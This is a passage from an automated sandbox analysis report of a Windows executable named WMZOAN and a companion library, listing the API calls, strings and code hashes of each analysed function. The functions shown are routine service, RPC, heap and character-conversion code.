                                            • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                            • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                            APIs
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Info
                                            • String ID:
                                            • API String ID: 1775632426-0
                                            • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                            • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                            • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                            • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071B1
                                            • GetLastError.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071BF
                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B071E9
                                            • FreeLibrary.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07257
                                            • GetProcAddress.KERNEL32(?,?,?,00007FFB23B072EB,?,?,?,00007FFB23B03EC0,?,?,?,?,00007FFB23B03CFD), ref: 00007FFB23B07263
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                            • Instruction ID: 6069a76703338e71bc357b6cfdeb1e6e31bf4d903b99e0accc154aecbe81b5b9
                                            • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                            • Instruction Fuzzy Hash: 4431F6A9F196C191EE139F22DC4967DA394BF49B60F1D0674ED9D2B790EE3CE4418300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value$ErrorLast
                                            • String ID:
                                            • API String ID: 2506987500-0
                                            • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                            • Instruction ID: 82347751c762d2673507ebcd4d9e0fee8e4ac203de02dc9e233f38cbd6292d22
                                            • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                            • Instruction Fuzzy Hash: 902160A8B0C6C245F967AF31DDDD13D61519F987B0F0C06B4E9FE266E6EE2CA4418300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                            • Instruction ID: 8412997f68514eaa03bf3c0bb3853e6575d94c669637f8d731f0cfa8b3bc2753
                                            • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                            • Instruction Fuzzy Hash: D3118465B28AC1C2E7518F66EC4832D72A0FB88BE4F084275EADD67794CF3CD5548744
                                            APIs
                                            • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                            • CreateEventW.KERNEL32 ref: 00000001400012C0
                                              • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                              • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                              • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                              • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                              • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                              • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                              • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                              • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                              • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                              • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                              • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                            • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                            • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                              • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                              • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                              • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                              • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                              • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                              • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                              • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                              • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                              • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                              • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                              • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                            • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                            • String ID: vseamps
                                            • API String ID: 3197017603-3944098904
                                            • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                            • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                            • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                            • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Messagesprintf_s
                                            • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                            • API String ID: 2642950106-3610746849
                                            • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                            • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                            • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                            • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                            • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                            • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                            • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                            • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                            • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                            • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                            APIs
                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                            • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 319667368-0
                                            • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                            • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                            • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                            • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                            APIs
                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                            • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                              • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                            • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                            • String ID:
                                            • API String ID: 1390108997-0
                                            • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                            • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                            • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                            • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 3523768491-393685449
                                            • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                            • Instruction ID: 7b2c76bb48ca57ebb40ccdd6a591b855a64f6aa99947e54b67314dbd7bae6525
                                            • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                            • Instruction Fuzzy Hash: A1E190B6A087C28AE7129F35D8C82AD77A0FB45748F184276DADD67A56DF38E481C700
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B095CB
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09601
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0962E
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0963F
                                            • FlsSetValue.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B09650
                                            • SetLastError.KERNEL32(?,?,?,00007FFB23B08BC9,?,?,?,?,00007FFB23B08C14), ref: 00007FFB23B0966B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Value$ErrorLast
                                            • String ID:
                                            • API String ID: 2506987500-0
                                            • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                            • Instruction ID: 35238c8a1c117beeb3cc9dd2d6e724ced465c93e942b4306dcb6866649d9e683
                                            • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                            • Instruction Fuzzy Hash: 63115BA8B0C2C245FA56AB31DDD913D21629F587B0F4C43B5E8EE266E6EE2CE4418300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                            • String ID:
                                            • API String ID: 3326452711-0
                                            • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                            • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                            • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                            • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                            • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                            • API String ID: 2984211723-1229430080
                                            • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                            • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                            • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                            • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                            • Instruction ID: dfd45076b07fd7aa7fffdcdbc3af6f7ae73b58e8dd51c5819bd5e3b0d907ecdf
                                            • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                            • Instruction Fuzzy Hash: 0AF044A9F1968681EA128F34EC4D33DA320AF45761F580375CAED595E4DF2CD049C740
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                            • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                            • ExitProcess.KERNEL32 ref: 0000000140008545
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
